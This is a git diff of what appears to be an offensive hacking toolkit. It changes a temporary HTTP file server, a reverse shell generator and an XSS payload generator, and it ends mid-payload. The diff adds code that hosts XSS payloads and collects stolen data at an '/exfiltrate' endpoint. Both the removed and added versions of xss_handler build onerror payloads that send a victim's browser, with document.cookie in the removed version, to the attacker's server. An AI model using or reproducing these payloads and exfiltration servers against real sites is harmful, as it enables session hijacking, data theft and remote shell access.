diff --git a/fileserver.py b/fileserver.py index e5f7972..f23b2c0 100755 --- a/fileserver.py +++ b/fileserver.py @@ -5,12 +5,10 @@ from http.server import BaseHTTPRequestHandler, HTTPServer from urllib.parse import urlparse import threading import requests -import sys import time import os import ssl import util -import xss_handler class FileServerRequestHandler(BaseHTTPRequestHandler): @@ -275,10 +273,6 @@ class HttpFileServer(HTTPServer): self.listen_thread.join() if __name__ == "__main__": - if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]: - print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0]) - exit(1) - parser = argparse.ArgumentParser(description="Spawn a temporary http server") parser.add_argument( "action", @@ -327,8 +321,11 @@ if __name__ == "__main__": file_server.forwardRequest("/proxy", url) print("Exfiltrate data using:", file_server.get_full_url("/proxy", ip_address)) elif args.action == "xss": + from xss_handler import generate_payload as generate_xss_payload payload_type = args.payload if args.payload else "img" - xss = xss_handler.generatePayload(payload_type, ip_addr, args.port) + xss = generate_xss_payload(payload_type, file_server.get_full_url("/exfiltrate", ip_address)) + file_server.addFile("/xss", xss) + file_server.dumpRequest("/exfiltrate") print("Exfiltrate data using:") print(xss) diff --git a/rev_shell.py b/rev_shell.py index b18b405..235a9f1 100755 --- a/rev_shell.py +++ b/rev_shell.py @@ -532,8 +532,8 @@ if __name__ == "__main__": parser = argparse.ArgumentParser(description="Reverse shell generator") parser.add_argument(dest="type", type=str, default=None, help="Payload type") - parser.add_argument("--port", type=int, required=False, default=None, help="Listening port") - parser.add_argument("--addr", type=str, required=False, default=util.get_address(), help="Listening address") + parser.add_argument("-p", "--port", type=int, required=False, default=None, help="Listening port") + parser.add_argument("-a", "--addr", type=str, required=False, default=util.get_address(), help="Listening address") args, extra = parser.parse_known_args() listen_port = args.port diff --git a/xss_handler.py b/xss_handler.py index a8ae727..17f1fda 100755 --- a/xss_handler.py +++ b/xss_handler.py @@ -1,108 +1,71 @@ #!/usr/bin/env python from hackingscripts import util -import sys -import http.server -import socketserver -from http.server import HTTPServer, BaseHTTPRequestHandler - -# returns http address -def getServerAddress(address, port): - if port == 80: - return "http://%s" % address - else: - return "http://%s:%d" % (address, port) - -# returns js code: 'http://xxxx:yy/?x='+document.cookie -def getCookieAddress(address, port): - return "'%s/?x='+document.cookie" % getServerAddress(address, port) - -def generatePayload(type, address, port): +from fileserver import HttpFileServer +import argparse +import random +def generate_payload(payload_type, url, index=None, **kwargs): payloads = [] - cookieAddress = getCookieAddress(address, port) media_tags = ["img","audio","video","image","body","script","object"] - if type in media_tags: - payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress)) + if payload_type in media_tags: + payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (payload_type, url)) - if type == "script": - payloads.append('' % cookieAddress) - payloads.append('' % url) + payloads.append('